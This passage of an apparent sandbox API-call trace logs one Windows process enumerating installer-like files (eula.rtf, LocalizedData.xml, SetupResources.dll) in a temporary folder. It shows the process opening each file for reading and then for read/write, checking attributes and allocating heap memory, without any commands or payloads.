lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.778] AreFileApisANSI () returned 1 [0061.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.778] AreFileApisANSI () returned 1 [0061.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69490 [0061.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0061.778] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.779] GetFileType (hFile=0x41c) returned 0x1 [0061.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0061.779] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.779] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.779] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.779] CloseHandle (hObject=0x41c) returned 1 [0061.779] AreFileApisANSI () returned 1 [0061.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0061.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0061.780] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.780] GetFileType (hFile=0x41c) returned 0x1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.780] CloseHandle (hObject=0x41c) returned 1 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.781] AreFileApisANSI () returned 1 [0061.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 36 [0061.781] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5)) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.781] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.781] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.781] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0061.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0061.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.782] AreFileApisANSI () returned 1 [0061.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.782] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.782] AreFileApisANSI () returned 1 [0061.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0061.782] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.783] GetFileType (hFile=0x41c) returned 0x1 [0061.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.783] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.783] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.784] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.784] CloseHandle (hObject=0x41c) returned 1 [0061.784] AreFileApisANSI () returned 1 [0061.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0061.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0061.784] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.784] GetFileType (hFile=0x41c) returned 0x1 [0061.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.784] CloseHandle (hObject=0x41c) returned 1 [0061.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.785] AreFileApisANSI () returned 1 [0061.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 45 [0061.785] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90)) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.785] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0061.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.786] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 